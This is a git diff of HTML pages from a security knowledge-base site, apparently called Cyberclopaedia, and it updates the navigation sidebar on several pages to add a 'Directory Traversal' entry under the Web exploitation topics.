        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -178,22 +178,6 @@

Heap Expl - - diff --git a/docs/Exploitation/Binary Exploitation/Stack Exploitation/Buffer Overflows.html b/docs/Exploitation/Binary Exploitation/Stack Exploitation/Buffer Overflows.html index e0109d00..5b83f8ef 100644 --- a/docs/Exploitation/Binary Exploitation/Stack Exploitation/Buffer Overflows.html +++ b/docs/Exploitation/Binary Exploitation/Stack Exploitation/Buffer Overflows.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -218,22 +218,6 @@

Shellcode - - diff --git a/docs/Exploitation/Binary Exploitation/Stack Exploitation/Format String Vulnerabilities.html b/docs/Exploitation/Binary Exploitation/Stack Exploitation/Format String Vulnerabilities.html index a1aedad8..2844d94f 100644 --- a/docs/Exploitation/Binary Exploitation/Stack Exploitation/Format String Vulnerabilities.html +++ b/docs/Exploitation/Binary Exploitation/Stack Exploitation/Format String Vulnerabilities.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
